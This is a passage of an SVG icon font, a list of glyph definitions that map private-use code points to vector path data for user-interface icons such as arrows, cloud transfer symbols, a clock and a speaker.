<glyph unicode="&#xe681;" d="M105.211 374.789c-83.288-83.288-83.288-218.293 0-301.581s218.29-83.285 301.578 0.003c83.288 83.288 83.291 218.29 0.003 301.578s-218.293 83.288-301.581 0zM394.726 85.274c-76.491-76.491-200.961-76.494-277.452-0.003s-76.491 200.964 0 277.455c76.491 76.491 200.963 76.491 277.455 0 76.49-76.491 76.487-200.961-0.003-277.452zM171.559 320.504l-12.063-12.063 84.442-84.442-84.042-84.043 12.063-12.063 84.042 84.042 84.043-84.042 12.063 12.063-84.042 84.043 84.442 84.442-12.063 12.063-84.443-84.442z" />
<glyph unicode="&#xe682;" d="M268.271 275.051l-12.071 12.071-96.565-96.566 12.069-12.069 84.496 84.495 84.096-84.096 12.069 12.071-48.203 48.203z" />
<glyph unicode="&#xe683;" d="M255.608 10.736c117.862 0 213.386 95.523 213.386 213.386s-95.523 213.386-213.386 213.386-213.385-95.524-213.385-213.386 95.523-213.386 213.385-213.386zM255.608 420.437c108.243 0 196.315-88.070 196.315-196.315 0-108.243-88.072-196.315-196.315-196.315s-196.315 88.072-196.315 196.315c0 108.245 88.072 196.315 196.315 196.315zM267.795 275.051l-12.071 12.071-96.564-96.566 12.069-12.069 84.495 84.495 84.097-84.096 12.069 12.071-48.203 48.203z" />
<glyph unicode="&#xe684;" d="M306.538 211.729l12.070 12.071-96.566 96.565-12.069-12.069 84.496-84.496-84.097-84.096 12.071-12.069 48.203 48.203z" />
<glyph unicode="&#xe685;" d="M42.223 224.122c0-117.862 95.523-213.386 213.386-213.386s213.386 95.523 213.386 213.386-95.524 213.386-213.387 213.386-213.385-95.524-213.385-213.386zM451.923 224.122c0-108.243-88.070-196.315-196.315-196.315-108.243 0-196.315 88.072-196.315 196.315s88.072 196.315 196.315 196.315c108.245 0 196.315-88.072 196.315-196.315zM306.538 211.935l12.070 12.071-96.566 96.565-12.069-12.069 84.496-84.496-84.097-84.096 12.071-12.069 48.203 48.203z" />
<glyph unicode="&#xe686;" d="M204.679 236.271l-12.071-12.071 96.567-96.565 12.069 12.069-84.496 84.496 84.096 84.096-12.070 12.069-48.203-48.203z" />
<glyph unicode="&#xe687;" d="M468.994 224.122c0 117.862-95.523 213.386-213.386 213.386s-213.385-95.524-213.385-213.386 95.523-213.386 213.386-213.386 213.385 95.524 213.385 213.386zM59.293 224.122c0 108.243 88.070 196.315 196.315 196.315 108.243 0 196.315-88.072 196.315-196.315s-88.072-196.315-196.315-196.315c-108.244 0-196.315 88.072-196.315 196.315zM204.679 236.309l-12.071-12.071 96.567-96.565 12.069 12.070-84.496 84.495 84.096 84.096-12.070 12.069-48.203-48.203z" />
<glyph unicode="&#xe688;" d="M243.729 173.193l12.071-12.071 96.565 96.567-12.069 12.069-84.496-84.496-84.096 84.096-12.069-12.071 48.203-48.203z" />
<glyph unicode="&#xe689;" d="M255.608 437.508c-117.862 0-213.386-95.523-213.386-213.386s95.523-213.386 213.386-213.386 213.386 95.523 213.386 213.386-95.523 213.386-213.386 213.386zM255.608 27.807c-108.243 0-196.315 88.070-196.315 196.315 0 108.243 88.072 196.315 196.315 196.315s196.315-88.072 196.315-196.315c0-108.245-88.072-196.315-196.315-196.315zM243.421 173.193l12.071-12.071 96.565 96.567-12.069 12.069-84.496-84.496-84.096 84.096-12.069-12.071 48.203-48.203z" />
<glyph unicode="&#xe68a;" d="M192.4 221.5l-12.1 12.1 76.4 76.4 76.4-76.4-12.1-12.1-55.8 55.8v-223.3h-17.1v223.3l-55.7-55.8zM419.1 326.9c0 1.4 0.2 2.7 0.2 4 0 73.1-59.2 132.3-132.3 132.3-52.6 0-97.9-30.8-119.2-75.3-9.2 4.6-19.6 7.3-30.6 7.3-33.8 0-61.8-24.6-67.2-56.8-40.2-13.8-69.2-51.9-69.2-96.8 0-56.5 45.8-102.3 102.3-102.3h111v17.1h-111c-47 0-85.2 38.3-85.2 85.3 0 36.4 23.2 68.8 57.7 80.7l9.6 3.3 1.7 10c4.2 24.7 25.4 42.6 50.4 42.6 8 0 15.7-1.9 22.9-5.5l15.6-7.8 7.5 15.7c19 39.7 59.7 65.4 103.7 65.4 63.5 0 115.2-51.7 115.2-115.2 0-0.3 0-0.7-0.1-1.1-0.1-0.8-0.1-1.7-0.1-2.6l-0.4-17.4 17.4-0.1c42.2-0.1 76.6-34.6 76.6-76.8 0-42.1-34.3-76.5-76.4-76.7h-119.8v-17.1h119.9c51.6 0.3 93.4 42.2 93.4 93.8-0.1 51.9-41.9 93.9-93.6 94z" />
<glyph unicode="&#xe68b;" d="M320.8 74.2l12.1-12.1-76.4-76.4-76.4 76.4 12.1 12.1 55.8-55.8v223.3h17v-223.3l55.8 55.8zM418.8 326.9c0 1.4 0.2 2.7 0.2 4 0 73.1-59.2 132.3-132.2 132.3-52.6 0-97.9-30.8-119.2-75.3-9.2 4.6-19.6 7.3-30.6 7.3-33.8 0-61.8-24.6-67.2-56.8-40.2-13.8-69.2-51.9-69.2-96.8 0-56.5 45.8-102.3 102.3-102.3h111v17.1h-111c-47 0-85.2 38.3-85.2 85.3 0 36.4 23.2 68.8 57.7 80.7l9.6 3.3 1.7 10c4.2 24.7 25.4 42.6 50.4 42.6 8 0 15.7-1.9 22.9-5.5l15.6-7.8 7.5 15.7c19.1 39.9 59.8 65.6 103.8 65.6 63.4-0.2 115.1-51.8 115.1-115.3 0-0.3 0-0.7-0.1-1.1-0.1-0.8-0.1-1.7-0.1-2.6l-0.4-17.4 17.4-0.1c42.2-0.1 76.6-34.6 76.6-76.8 0-42.1-34.3-76.5-76.4-76.7h-119.9v-17.1h119.9c51.6 0.3 93.4 42.2 93.4 93.8 0 51.8-41.9 93.8-93.6 93.9z" />
<glyph unicode="&#xe68c;" d="M268.548 307.922c-27.797 0-50.351-22.542-50.351-50.346 0-27.811 22.554-50.362 50.351-50.362 27.818 0 50.354 22.55 50.354 50.362 0 27.803-22.538 50.345-50.354 50.345zM268.548 224c-18.504 0-33.567 15.064-33.567 33.577 0 18.505 15.064 33.56 33.567 33.56 18.522 0 33.57-15.055 33.57-33.56 0-18.514-15.048-33.577-33.57-33.577zM67.136 383.452v-251.765h402.824v251.765h-402.824zM453.178 326.668v-178.198h-369.256v218.197h369.256v-39.998zM379.942 114.902h-329.589v234.98h-16.785v-251.765h402.825v16.786h-16.784zM346.373 81.332h-329.589v234.981h-16.784v-251.766h402.825v16.784h-16.786zM109.098 349.358h50.354v-16.784h-50.353v16.784zM109.098 182.039h50.354v-16.784h-50.353v16.784zM377.649 349.358h50.353v-16.784h-50.353v16.784zM377.649 182.039h50.353v-16.784h-50.353v16.784z" horiz-adv-x="470" />
<glyph unicode="&#xe68d;" d="M118.982-31.232v233.236l-101.787-101.731-11.867 11.875 107.804 107.736-113.13 113.036 11.867 11.875 107.115-107.037v241.476l138.684-138.611-120.8-120.74 116.704-116.618-134.586-134.496zM135.766 197.25v-187.98l94.067 93.994-94.067 93.986zM135.766 438.73v-196.217l98.165 98.109-98.166 98.108z" horiz-adv-x="258" />
<glyph unicode="&#xe68e;" d="M184.708 299.464h117.475l50.353 59.175-50.353 58.315h-117.476v33.63h-16.784v-33.63h-151.142v-117.49h151.142v-16.723h-117.573l-50.352-58.315 50.352-59.171h117.573v-167.844h16.784v167.844h151.043v117.486h-151.042v16.722zM33.569 316.249v83.921h260.928l35.93-41.608-35.995-42.313h-260.864zM318.967 265.957v-83.918h-260.846l-36.011 42.305 35.929 41.613 260.926-0zM50.23 383.452h83.922v-16.784h-83.922v16.784zM218.114 249.087h83.922v-16.785h-83.922v16.785z" horiz-adv-x="353" />
<glyph unicode="&#xe68f;" d="M268.567 282.745h117.476v-16.784h-117.476v16.784zM268.55 182.039h117.492v-16.784h-117.492v16.784zM268.55 232.393h83.792v-16.785h-83.792v16.785zM251.766 383.452v50.353h-67.138v-50.353h-184.628v-369.257h436.394v369.257h-184.627zM419.61 366.666v-33.568h-167.844v33.569h167.844zM201.412 417.020h33.57v-83.922h-33.57v83.922zM16.785 366.666h167.845v-33.568h-167.845v33.569zM16.785 30.979v285.334h402.825v-285.334h-402.825zM247.406 105.575c-12.113 5.046-40.716 14.981-58.435 20.209-1.508 0.474-1.736 0.558-1.736 6.851 0 5.18 2.129 10.408 4.21 14.834 2.244 4.812 4.934 12.89 5.884 20.144 2.689 3.13 6.343 9.277 8.72 21.005 2.049 10.327 1.097 14.088-0.279 17.628-0.148 0.37-0.296 0.729-0.41 1.098-0.524 2.428 0.196 15.012 1.968 24.786 1.212 6.696-0.311 20.952-9.54 32.743-5.82 7.452-16.964 16.6-37.341 17.87l-11.178-0.008c-20.014-1.262-31.177-10.413-36.995-17.862-9.228-11.792-10.767-26.048-9.555-32.743 1.787-9.774 2.49-22.358 1.984-24.736-0.097-0.42-0.263-0.779-0.408-1.149-1.361-3.541-2.328-7.301-0.264-17.628 2.344-11.728 6-17.874 8.704-21.005 0.933-7.254 3.623-15.334 5.884-20.144 1.654-3.516 2.442-8.303 2.442-15.065 0-6.293-0.246-6.37-1.656-6.82-18.308-5.409-47.468-15.94-58.334-20.694-8.622-3.697-10.72-10.334-10.72-16.318 0-1.673 0-4.293 0-7.245h16.785v7.248c0 0.269 0.016 0.476 0.032 0.639 0.147 0.082 0.344 0.18 0.624 0.293 10.326 4.524 38.928 14.834 56.696 20.079 13.357 4.245 13.357 16.784 13.357 22.817 0 9.293-1.279 16.358-4.031 22.228-1.688 3.582-3.754 9.93-4.428 15.137l-0.654 5.007-3.293 3.82c-0.508 0.574-3.066 3.902-4.951 13.326-1.278 6.358-0.82 7.54-0.558 8.228 0.442 1.082 0.82 2.163 1.163 3.688 1.476 6.786-0.475 23.73-1.85 31.282-0.459 2.475 0.197 11.677 6.245 19.419 5.31 6.794 13.506 10.634 24.357 11.412l10.064 0.008c11.048-0.786 19.341-4.625 24.653-11.424 6.065-7.738 6.704-16.94 6.262-19.403-1.377-7.548-3.328-24.486-1.869-31.313l0.146-0.652 0.18-0.64c0.231-0.73 0.476-1.442 0.838-2.377 0.279-0.697 0.736-1.87-0.524-8.209-1.903-9.433-4.476-12.793-4.986-13.375l-3.262-3.788-0.656-4.966c-0.689-5.22-2.752-11.603-4.426-15.178-2.72-5.753-5.82-13.459-5.82-21.996 0-6.033 0-18.589 13.769-22.948 16.768-4.952 44.879-14.654 56.564-19.541 1.77-0.754 2.41-1.686 2.593-2.033v-6.786h16.785c0 2.952 0 5.572 0 7.245-0 5.988-4.149 13.298-12.754 17.002z" horiz-adv-x="437" />
<glyph unicode="&#xe690;" d="M210.149 306.852h-16.786v-95.784l52.813-52.812 11.868 11.868-47.896 47.894zM439.13 324.875l-118.686 118.687-89.397-89.405c-9.458 1.983-19.244 3.049-29.291 3.049-78.66 0-142.667-63.999-142.667-142.664 0-10.033 1.082-19.832 3.048-29.291l-62.138-62.138 24.718-95.928 93.969-22.75 68.22 68.219c4.884-0.491 9.834-0.77 14.85-0.77 78.676 0 142.667 64 142.667 142.658 0 5.015-0.264 9.97-0.771 14.855l95.478 95.48zM320.445 419.824l94.952-94.949-75.463-75.456c-11.688 46.288-45.978 83.562-90.48 99.411l70.99 70.993zM113.474 22.957l-75.004 18.161-19.834 76.9 48.828 48.827c15.867-44.502 53.139-78.784 99.429-90.469l-53.422-53.418zM201.756 88.668c-69.4 0-125.882 56.459-125.882 125.875 0 69.412 56.483 125.877 125.882 125.877 69.415 0 125.883-56.466 125.883-125.877 0-69.416-56.467-125.875-125.882-125.875z" horiz-adv-x="439" />
<glyph unicode="&#xe691;" d="M50.434 253.398c0-88.061 71.382-159.444 159.434-159.444 88.089 0 159.468 71.382 159.468 159.444 0 88.076-71.379 159.458-159.468 159.458-88.050-0.002-159.434-71.38-159.434-159.458zM209.871 396.068c78.677 0 142.682-64.002 142.682-142.671 0-78.659-64.007-142.657-142.682-142.657-78.66 0-142.653 63.998-142.653 142.657 0.001 78.669 63.99 142.672 142.653 142.672zM304.94 66.204l8.079-16.324 15.048 7.442-22.818 46.074-15.046-7.458 7.277-14.67c-26.995-13.752-57.058-21.046-87.611-21.046-106.474 0-193.084 86.658-193.084 193.176 0 72.563 41.109 139.118 105.312 171.99l7.802-15.752 15.031 7.45-22.818 46.063-15.030-7.451 7.573-15.28c-69.891-35.692-114.654-108.082-114.654-187.022 0-112.959 89.642-205.32 201.494-209.747v-25.538c-38.75-1.507-74.841-13.457-105.46-33.257h35.109c24.030 10.752 50.632 16.784 78.628 16.784 27.506 0 54.139-5.966 78.447-16.784h35.258c-30.995 19.964-67.219 31.7-105.197 33.257v25.603c30.224 1.214 59.826 8.868 86.659 22.49z" horiz-adv-x="370" />
<glyph unicode="&#xe692;" d="M218.166 395.616l-122.983-98.038h-95.183v-75.878l-0.066-0.044 0.066-0.044v-75.091h95.674l122.49-96.126v96.125h0.032v151.060h-0.032v98.038h0.002zM201.414 163.303h-0.032v-78.399l-99.904 78.399h-84.692v117.491h84.266l100.329 79.98v-63.196l0.032-16.784v-117.49h0.001zM257.389 308.339c18.26-24.329 27.914-53.322 27.914-83.851 0-31.163-10.030-60.652-28.995-85.278l13.308-10.236c21.243 27.587 32.471 60.615 32.471 95.516 0 34.191-10.818 66.67-31.274 93.924l-13.425-10.074zM325 369.173l-12.948-10.686c31.536-38.188 48.91-86.553 48.91-136.192 0-49.050-16.144-95.19-46.666-133.425l13.13-10.474c32.913 41.24 50.32 90.995 50.32 143.899 0.002 53.529-18.733 105.692-52.745 146.88zM377.255 423.669l-12.59-11.088c46.289-52.566 71.776-120.163 71.776-190.346 0-68.76-24.601-135.332-69.267-187.438l12.736-10.916c47.289 55.139 73.318 125.588 73.318 198.356-0.002 74.267-26.98 145.806-75.974 201.433z" horiz-adv-x="454" />
<glyph unicode="&#xe693;" d="M0.001 128.040c0-7.344 0-29.12 0-33.922s2.852-13.014 13.146-13.014c7.9 0 71.006 0 99.918 0 8.754 0 14.406 0 14.406 0h2.476c0 0 1.656 0 4.328 0 0-7.736 0-14.786 0-17.483 0-5.94 3.524-16.088 16.276-16.088 9.786 0 88.15 0 123.93 0 10.834 0 17.85 0 17.85 0h3.065c0 0 6.884 0 17.555 0 35.666 0 114.149 0 123.951 0 12.735 0 16.274 10.147 16.274 16.088s0 32.874 0 41.961-3.212 19.161-16.274 24.776c-16.508 7.228-60.78 23.226-88.596 31.438-2.147 0.68-2.508 0.793-2.508 10.342 0 10.277 1.18 17.548 3.688 22.89 3.442 7.302 7.507 19.579 8.95 30.594 4.096 4.737 9.654 14.080 13.209 31.888 3.149 15.695 1.673 21.406-0.394 26.766-0.229 0.566-0.459 1.123-0.623 1.754-0.771 3.606 0.294 22.726 3 37.568 1.85 10.171-0.476 31.815-14.49 49.723-8.849 11.317-25.798 25.208-56.204 27.126l-16.964 0.016c-30.93-1.934-47.861-15.826-56.712-27.142-14.012-17.908-16.34-39.552-14.488-49.731 2.688-14.834 3.769-33.955 2.983-37.634-0.164-0.558-0.393-1.115-0.607-1.68-2.082-5.36-3.541-11.072-0.41-26.766 3.572-17.808 9.13-27.152 13.21-31.888 1.459-11.014 5.524-23.292 8.951-30.594 3.162-6.72 6.407-14.662 6.407-22.546 0-9.546-0.361-9.661-2.654-10.382-5.721-1.68-12.21-3.705-19.030-5.892-16.063 5.966-36.272 12.95-50.928 17.286-1.737 0.546-2.031 0.639-2.031 8.36 0 8.31 0.966 14.185 2.982 18.505 2.788 5.909 6.066 15.825 7.246 24.734 3.294 3.827 7.786 11.384 10.671 25.784 2.542 12.686 1.344 17.3-0.328 21.636-0.18 0.458-0.361 0.909-0.49 1.418-0.624 2.918 0.23 18.375 2.407 30.374 1.492 8.22-0.375 25.717-11.702 40.207-7.146 9.138-20.849 20.374-45.404 21.93h-13.701c-24.998-1.556-38.666-12.793-45.83-21.93-11.326-14.49-13.21-31.986-11.704-40.207 2.164-11.998 3.049-27.456 2.409-30.438-0.13-0.442-0.328-0.894-0.492-1.352-1.689-4.335-2.868-8.95-0.328-21.636 2.885-14.399 7.376-21.956 10.671-25.784 1.18-8.907 4.458-18.823 7.228-24.734 2.556-5.433 5.18-11.851 5.18-18.226 0-7.72-0.296-7.812-2.147-8.401-21.734-6.418-56.844-18.605-71.71-24.824-10.553-4.534-15.62-13.515-15.62-20.866zM151.061 105.584c0 2.491 2.49 7.515 9.18 10.384 17.653 7.375 60.892 22.284 87.167 30.038 14.685 4.613 14.685 17.252 14.685 26.479 0 11.18-4.048 21.286-8.014 29.692-2.738 5.86-6.263 16.4-7.49 25.653l-0.655 4.958-3.278 3.794c-1.804 2.094-6.345 8.654-9.459 24.234-2.426 12.17-1.359 14.94-0.409 17.387l0.017 0.024 0.146 0.414c0.347 0.861 0.656 1.726 0.904 2.582l0.18 0.606 0.131 0.623c1.72 8.024-0.524 31.114-2.884 44.133-1.066 5.86 0.279 22.439 11.194 36.396 9.72 12.416 24.52 19.378 44.028 20.702l15.882-0.016c23.882-1.639 36.848-12.134 43.536-20.68 10.932-13.961 12.26-30.536 11.194-36.376-2.31-12.688-4.589-36.166-2.901-44.084l0.082-0.356 0.098-0.357c0.346-1.356 0.786-2.574 1.277-3.786 0.87-2.258 1.952-5.065-0.474-17.214-3.115-15.592-7.654-22.124-9.459-24.206l-3.294-3.811-0.639-4.99c-1.229-9.26-4.736-19.767-7.507-25.618-3.606-7.697-5.279-17.236-5.279-30.046 0-9.212 0-21.832 14.209-26.34 27.078-7.998 71.039-23.858 86.938-30.817 4.736-2.032 6.229-4.31 6.229-9.4v-41.264h-285.25l-0.082 41.262zM16.785 128.040c0.032 0.654 1.066 3.557 5.459 5.44 14.392 6.024 49.058 18.014 69.842 24.152 14.178 4.508 14.178 17.022 14.178 24.497 0 9.652-3.426 18.241-6.786 25.373-2.18 4.663-4.868 12.981-5.77 19.792l-0.656 4.958-3.262 3.786c-1.016 1.173-4.492 5.946-6.933 18.129-1.786 8.917-1.066 10.765-0.492 12.252l0.098 0.221 0.066 0.221c0.344 0.869 0.573 1.558 0.77 2.234l0.197 0.62 0.13 0.63c1.656 7.736-0.722 28.209-2.311 36.945-0.737 4.106 0.344 16.538 8.424 26.881 7.245 9.252 18.391 14.465 33.142 15.481h12.604c18.030-1.274 27.75-9.106 32.734-15.486 8.064-10.326 9.162-22.779 8.424-26.874-1.689-9.228-3.901-29.458-2.328-36.872l0.082-0.347 0.082-0.346c0.314-1.18 0.689-2.246 1.099-3.307 0.574-1.471 1.294-3.356-0.476-12.256-2.442-12.186-5.917-16.944-6.934-18.112l-3.262-3.794-0.655-4.964c-0.918-6.844-3.607-15.147-5.803-19.801-3.113-6.671-4.572-14.808-4.572-25.642 0-7.485 0-20.014 13.751-24.368 8.686-2.572 19.506-6.128 30.192-9.849-17.654-6.048-34.487-12.18-44.208-16.243-13.081-5.614-19.341-16.719-19.341-25.808 0-1.894 0-4.598 0-7.695h-117.492v30.151z" horiz-adv-x="453" />
<glyph unicode="&#xe694;" d="M201.34 425.413c-111.246 0-201.412-90.183-201.412-201.413s90.166-201.412 201.412-201.412c111.23 0 201.411 90.182 201.411 201.412s-90.183 201.413-201.411 201.413zM90.864 76.152c12.326 4.534 25.848 9.106 37.88 13.147 41.093 13.81 47.419 15.93 47.419 29.791v32.413l-14.031 2.336c-1 0.173-24.636 4.072-40.518 4.072-8.195 0-12.85 0.204-17.343 3.154 11.556 25.292 23.505 64.86 28.029 96.162l0.869-0.298 1.246 22.181c1.968 35.54 31.356 63.38 66.924 63.38 35.552 0 64.941-27.84 66.924-63.38l1.459-22.1 0.639 0.217c4.524-31.302 16.473-70.87 28.029-96.162-4.474-2.95-9.146-3.154-17.325-3.154-16.112 0-38.944-5.080-41.484-5.663l-13.066-2.966v-30.192c0-13.71 6.556-16.031 49.238-31.11 11.064-3.918 23.438-8.302 34.913-12.647-30.634-22.578-68.45-35.962-109.327-35.962-41.387-0.002-79.644 13.685-110.475 36.779zM325.582 87.553c-34.24 13.548-82.281 28.438-82.281 31.538 0 3.846 0 16.792 0 16.792s23.078 5.244 37.764 5.244 25.178 0.918 37.766 16.652c-15.736 27.798-33.57 90.347-33.57 122.343l-0.245-0.082c-2.442 44.157-38.912 79.234-83.676 79.234s-81.234-35.077-83.692-79.234l-0.23 0.082c0-31.996-17.834-94.543-33.57-122.343 12.59-15.736 23.078-16.652 37.764-16.652s37.766-3.844 37.766-3.844 0-14.348 0-18.194c0-3.147-49.141-17.301-83.299-30.576-36.486 33.757-59.368 81.986-59.368 135.486 0 101.805 82.824 184.628 184.628 184.628s184.626-82.824 184.626-184.628c0.002-53.998-23.304-102.654-60.382-136.446z" horiz-adv-x="403" />
<glyph unicode="&#xe695;" d="M419.541 224c0 115.884-93.936 209.804-209.804 209.804s-209.804-93.92-209.804-209.804c0-115.868 93.936-209.804 209.805-209.804 115.867 0 209.804 93.937 209.804 209.804zM16.715 224c0 106.435 86.594 193.020 193.020 193.020 106.442 0 193.020-86.585 193.020-193.020s-86.578-193.020-193.020-193.020c-106.427 0-193.020 86.586-193.020 193.020zM299.934 236.736l11.868 11.868-102.065 102.058-102.052-102.058 11.87-11.868 81.791 81.799v-203.632h16.782v203.632z" horiz-adv-x="420" />
<glyph unicode="&#xe696;" d="M302.118 224c0 83.43-67.629 151.060-151.059 151.060s-151.060-67.628-151.060-151.060c0-83.43 67.629-151.060 151.060-151.060s151.059 67.63 151.059 151.060zM151.060 89.724c-74.038 0-134.274 60.238-134.274 134.276s60.237 134.275 134.274 134.275c74.038 0 134.274-60.237 134.274-134.275s-60.237-134.275-134.274-134.275zM352.471 375.060h-128.734c9.769-4.721 18.998-10.343 27.602-16.784h101.132c74.041 0 134.274-60.236 134.274-134.275s-60.236-134.275-134.274-134.275h-101.132c-8.606-6.442-17.834-12.063-27.602-16.784h128.734c83.43 0 151.060 67.63 151.060 151.060s-67.63 151.060-151.060 151.060z" horiz-adv-x="504" />
<glyph unicode="&#xe697;" d="M216.555 189.514l250.438-1.902-14.39 14.466c-1.067 1.067-106.788 104.5-248.242 5.35l-44.877 65.916c5.689 4.728 10.606 10.597 14.31 17.534 15.276 28.639 4.441 64.216-24.178 79.484-28.636 15.276-64.22 4.454-79.48-24.176-15.276-28.626-4.459-64.207 24.177-79.488 16.374-8.728 34.994-8.892 50.829-2.114l39.518-58.042-67.597 0.51c-2.228 18.406-13.064 35.46-30.651 44.841-28.636 15.272-64.204 4.446-79.48-24.19-15.277-28.618-4.458-64.202 24.177-79.479 28.619-15.26 64.22-4.442 79.48 24.178 3.082 5.755 5.032 11.786 6.066 17.866l78.464-0.591c-1.904-41.96 5.671-75.399 18.078-102.18h-28.57v-16.784h50.352v8.392h1.049c-0.361 0.606-0.689 1.279-1.049 1.902v6.49h-3.572c-10.802 21.021-18.358 46.993-19.653 79.226l53.958-79.226h-13.95v-16.784h50.354v16.784h-16.113l-69.448 102.019zM406.591 214.396c6.096-3.262 11.442-6.565 15.982-9.673l-189.201 1.452c75.792 44.124 137.373 27.332 173.219 8.221zM102.212 281.508c-20.406 10.891-28.16 36.362-17.276 56.77 10.884 20.414 36.355 28.168 56.778 17.276 20.406-10.884 28.16-36.356 17.26-56.774-10.884-20.416-36.355-28.16-56.761-17.272zM95.786 180.301c-10.884-20.406-36.355-28.144-56.778-17.26-20.407 10.882-28.16 36.354-17.276 56.762 10.9 20.419 36.355 28.168 56.779 17.276 20.407-10.887 28.159-36.356 17.276-56.779zM117.488 87.496h50.353v-16.784h-50.353v16.784zM318.9 87.496h50.353v-16.784h-50.353v16.784zM50.35 87.496h50.353v-16.784h-50.353v16.784zM386.038 87.496h50.351v-16.784h-50.351v16.784z" horiz-adv-x="467" />
<glyph unicode="&#xe698;" d="M209.804 299.529c-38.862 0-70.858-29.372-75.038-67.137h-17.276v-16.784h17.276c4.18-37.764 36.174-67.138 75.038-67.138 41.716 0 75.53 33.815 75.53 75.53s-33.814 75.53-75.53 75.53zM209.804 165.255c-29.536 0-53.975 21.93-58.072 50.353h58.072v16.785h-58.072c4.097 28.422 28.538 50.352 58.072 50.352 32.389 0 58.744-26.356 58.744-58.745s-26.356-58.745-58.745-58.745zM50.353 147.421v50.353h-16.784v-67.137h16.784zM50.353 265.961v50.353h-16.784v-67.137h16.784zM67.138 366.666v-285.336h285.334v285.336h-285.334zM335.688 98.118h-251.766v251.766h251.766v-251.766h0zM0.001 417.020v-386.041h419.608v386.041h-419.608zM402.825 47.764h-386.041v352.472h386.042v-352.472h-0.002z" horiz-adv-x="420" />
<glyph unicode="&#xe699;" d="M209.766 14.195c115.884 0 209.804 93.936 209.804 209.805s-93.921 209.804-209.804 209.804c-115.868 0-209.804-93.936-209.804-209.804s93.938-209.804 209.804-209.804zM209.766 417.020c106.427 0 193.022-86.594 193.022-193.020 0-106.435-86.594-193.020-193.020-193.020-106.442 0-193.020 86.586-193.020 193.020-0 106.427 86.576 193.020 193.019 193.020zM222.5 133.8l11.868-11.866 102.050 102.067-102.050 102.058-11.868-11.868 81.792-81.798h-203.626v-16.784h203.626z" horiz-adv-x="420" />
<glyph unicode="&#xe69a;" d="M300.87 184.695l-132.29-132.292-0.065 0.084c-0.492-0.51-0.904-1.067-1.41-1.558-34.356-34.354-90.264-34.354-124.621 0-33.355 33.356-34.224 86.957-2.819 121.49l17.654-17.637 27.88 27.865c37.421-17.849 83.544-11.392 114.541 19.603l47.487 47.472 11.867-11.868 11.868 11.868-47.486 47.468 71.217 71.211-11.868 11.867-71.219-71.21-47.469 47.476 71.202 71.211-11.85 11.875-71.22-71.219-47.466 47.476-11.868-11.867 11.868-11.868-47.486-47.476c-30.996-30.995-37.454-77.119-19.587-114.548l-27.881-27.869 17.948-17.964c-37.946-41.092-37.077-105.327 2.82-145.224 40.895-40.912 107.459-40.912 148.354 0l133.768 133.767c29.306 29.308 77.004 29.308 106.327 0l11.868 11.868c-35.863 35.851-94.216 35.851-130.064-0zM69.186 332.799l47.484 47.469 118.671-118.68-47.468-47.471c-32.718-32.718-85.956-32.718-118.688 0-32.717 32.719-32.717 85.957-0.001 118.682zM46.517 215.18c3.228-4.522 6.752-8.884 10.801-12.932 4.065-4.064 8.424-7.589 12.932-10.8l-12.932-12.932-23.734 23.735 12.934 12.93z" horiz-adv-x="431" />
<glyph unicode="&#xe69b;" d="M0 315.462l8.081-5.752c1.427-1.017 14.72-9.934 41.666-9.934 4.328 0 8.802 0.246 13.374 0.705 60.025-69.53 102.574-119.556 112.966-132.783-19.636-43.764-22.718-92.921-8.589-138.98l4.097-13.342 122.081 122.096 132.948-132.947 11.866 11.868-132.947 132.948 122.097 122.096-13.342 4.082c-45.272 13.882-95.772 10.75-138.98-8.59-13.195 10.375-63.072 52.795-132.472 112.706 1.754 10.704 3.688 34.93-9.196 55.058l-5.638 8.786-128.012-128.016zM27.668 319.38l96.511 96.526c6.162-17.948 1.442-37.109 1.376-37.339l-1.278-5.032 3.916-3.425c118.54-102.363 138.095-118.246 143.864-120.737l-0.034-0.097 3.115-0.934 2.967 1.393c36.11 17.261 78.447 22.046 117.49 13.375l-215.704-215.69c-8.802 39.519-4.197 80.726 13.391 117.474l1.672 3.491-1.571 3.541-0.492-0.212c-5.148 10.113-29.291 38.074-119.966 143.108l-2.966 3.442-4.508-0.607c-5.41-0.721-10.687-1.098-15.703-1.098-9.524-0.002-16.85 1.326-22.080 2.817z" horiz-adv-x="439" />
<glyph unicode="&#xe69c;" d="M33.574 385.55c20.948 20.947 48.796 32.486 78.431 32.486v0c29.633 0 57.483-11.539 78.43-32.486l224.558-224.572c29.913-29.914 29.913-78.612 0-108.526-14.49-14.506-33.767-22.486-54.272-22.486-20.504 0-39.78 7.982-54.268 22.486l-99.151 99.134 0.082 0.080-118.507 118.524c-8.047 8.032-12.474 18.736-12.474 30.094 0 11.375 4.426 22.062 12.474 30.11 8.032 8.031 18.718 12.474 30.094 12.474 11.375 0 22.063-4.442 30.095-12.474l189.938-189.922-11.868-11.868-189.94 189.922c-9.736 9.736-26.716 9.736-36.453 0-4.868-4.868-7.556-11.342-7.556-18.242 0-6.885 2.688-13.36 7.556-18.228l217.574-217.738c11.324-11.342 26.374-17.57 42.403-17.57 16.014 0 31.078 6.229 42.404 17.57 23.374 23.375 23.374 61.416 0 84.792l-224.555 224.572c-17.786 17.784-41.42 27.569-66.564 27.569-25.144 0-48.78-9.785-66.564-27.569s-27.586-41.42-27.586-66.564c0-25.144 9.802-48.796 27.586-66.582l196.823-196.821-11.868-11.868-196.822 196.825c-20.964 20.964-32.504 48.812-32.504 78.447s11.54 57.483 32.504 78.432z" horiz-adv-x="439" />
<glyph unicode="&#xe69d;" d="M100.707 253.373h201.413v-16.784h-201.412v16.784zM100.707 186.236h201.413v-16.784h-201.412v16.784zM100.707 119.090h134.274v-16.786h-134.274v16.786zM251.012 421.216c-4 23.804-24.654 41.962-49.599 41.962-24.939 0-45.593-18.158-49.598-41.962h-151.816v-436.394h402.824v436.394h-151.811zM167.845 382.685v30.139c0 18.51 15.063 33.57 33.57 33.57 18.514 0 33.57-15.060 33.57-33.57v-30.142l8.488-4.827c16.482-9.38 29.119-23.636 36.372-40.56h-156.845c7.251 16.928 19.889 31.18 36.372 40.56l8.474 4.832zM386.040 1.606h-369.256v402.825h134.275v-11.989c-26.201-14.916-45.19-41.064-50.352-71.932h201.412c-5.148 30.872-24.144 57.015-50.352 71.932v11.989h134.274v-402.825z" horiz-adv-x="403" />
<glyph unicode="&#xe69e;" d="M327.296 190.432v41.972h-117.49v25.172h75.53v167.824h-167.844v-167.824h75.53v-25.172h-117.492v-41.973h-75.53v-167.836h167.843v167.836h-75.528v25.192h218.197v-25.192h-75.53v-167.837h167.846v167.837h-75.531zM134.274 408.616h134.276v-134.255h-134.276v134.255zM151.058 39.38h-134.274v134.267h134.275l-0.001-134.267zM386.040 39.38h-134.274v134.267h134.274v-134.267z" horiz-adv-x="403" />
